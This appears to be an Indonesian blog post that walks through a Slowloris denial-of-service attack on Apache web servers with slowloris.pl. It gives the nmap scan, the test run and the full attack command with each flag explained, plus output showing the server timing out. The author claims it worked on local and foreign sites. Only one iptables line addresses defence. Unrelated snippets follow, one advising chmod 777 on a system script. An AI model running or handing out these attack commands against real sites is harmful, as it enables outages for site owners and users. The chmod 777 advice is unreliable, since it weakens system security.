ddos memakai slowloris.pl

Klo ngomongin ginian jadi inget ama si tommy hahahahaha…

slowloris.pl , sebenarnya adalah tools yang di buat dengan perl yang di pergunakan oleh lamer untuk melakukan serangan DDOS ke HTTPD service ( apache ) pada port 80 secara random dan hebatnya lagi , tidak memerlukan bandwidth yang begitu besar.

kronologisnya kira-kira begini ..
ane test di localhost aja Smile

pertama-tama lamer akan melakukan port scanning
Code:

networker@nahja97:~$ nmap -A 127.0.0.1 -PN

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-03-18 12:24 WIT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE    VERSION
80/tcp open http       Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
5432/tcp open  postgresql PostgreSQL DB 8.3.9

perhatikan hasil nmap yang saya beri warna merah …ya anda benar dia mencari open port 80 yang tampaknya sudah pasti kebuka di setiap web server manapun.

kemudian si lamer akan menjalankan aksinya dengan menggunakan slowloris.pl.
awalnya dia bakalan ngetes terlebih dahulu, kira-kira server ini vurln atau tidak .

syntaxnya
Code:

perl slowloris.pl -dns [ web domain/ip target ] -port 80 -test.

Code:

sudo perl slowloris.pl -dns 127.0.0.1 -port 80 -test

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
This test could take up to 14.3666666666667 minutes.
Connection successful, now comes the waiting game...
Trying a 2 second delay:
        Worked.
Trying a 30 second delay:
        Worked.
Trying a 90 second delay:
        Worked.
Trying a 240 second delay:
        Worked.
Trying a 500 second delay:
        Worked.
Remote server closed socket.
Use 500 seconds for -timeout.

setelah mereka mengetahui limit timeout yg sesuai dengan situs target , si lamer akan langsung melakukan kegiatan inti , yaitu mengirimkan paket flood secara random

format yang sudah ane tes di beberapa situs lokal maupun luar dan 100 persen :
Code:

perl slowloris.pl -dns [target] -port 80 -timeout 500 -num 500 -tcpto 5 -httpready

keterangan :

* -dns : the target ( dapat berupa IP atau domain )

* -port : port yg di gunakan oleh webserver ( 80 )

* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test

* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi

* -tcpto : TCP Timeout.

* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.
Code:

networker@nahja97:~$ sudo perl slowloris.pl -dns 127.0.0.1 -port 80 -timeout 500 -num 500 -tcpto 5 -httpready
[sudo] password for zee-laptop:

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
Multithreading enabled.
Connecting to 127.0.0.1:80 every 500 seconds with 500 sockets:
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Building sockets.
                Sending data.
Current stats:  Slowloris has now sent 99 packets successfully.
This thread now sleeping for 500 seconds...

Hasilnya sudah dapat di tebak timeout!!!!..
Network Timeout
The server at 127.0.0.1 is taking too long to respond.
The requested site did not respond to a connection request and the browser has stopped waiting for a reply
* Could the server be experiencing high demand or a temporary outage? Try again later.
* Are you unable to browse other sites? Check the computers network connection.
* Is your computer or network protected by a firewall or proxy? Incorrect settings can interfere with Web browsing.
* Still having trouble? Consult your network administrator or Internet provider for assistance.

si lamer berhasil… Berbagi kek gini rasanya dosa klo gk di share juga cara penangkalnya .. nah untuk menanganinya ane cuma setting iptables dikit ..
Code:

networker@nahja97:~$ sudo iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 32 -j DROP

dengan arti kata ane membatasi koneksi limit pada per host pada port 80 menjadi 20 … nah mari kita diskusikan siapa tau teman-teman memiliki cara yang lain nya Smile

Untuk slowloris.pl ini source nya
Code:

wget http://ha.ckers.org/slowloris/slowloris.pl

dasar backtrack

LS ( sama dengan fungsi “dir” pada windows ) yaitu melihat isi directory CD Mengubah posisi  directory, ( bagi para pengguna windows perintah yang biasa di pakai di cmd ini, mah dah gk asing ) (cat : kalo lo kepingin  keluar dari direktori  yang di panggil tadi, lo tinggal ketik  “cd ” tanpa tanda kutip ) CAT Perintah untuk membaca file NANO Perintah ini... [Baca selengkapnya]

percepat download pakek BT

Apt-fast adalah sebuah script sederhana yang memungkinan download secara pararel. cara install Code: download file apt-fast dari http://www.mattparnell.com/linux/apt-fast/apt-fast.sh kalo sudah didownload kemudian pindahkan file tersebut ke /usr/bin dan ganti nama filenya dari terminal : Code: sudo mv apt-fast.sh /usr/bin/apt-fast kasih permission : Code: sudo chmod 777 /usr/bin/apt-fast install axel Code: apt-get install axel selesaiiii Big Grin om om sekalian bisa coba pakai apt-fast , cara penggunaannya sebagai berikut : Code: sudo apt-fast install [nama package] sudo apt-fast... [Baca selengkapnya]

mengembalikan data yang hilang

bagi pengguna komputer
ane punya software bagus nih,maw tahu gak?
namanya getdataback
fungsinya untuk mengembalikan data anda yang hilang
silahkan dicoba dulu softwarenya
barangkali ada yang berminat
download klik disini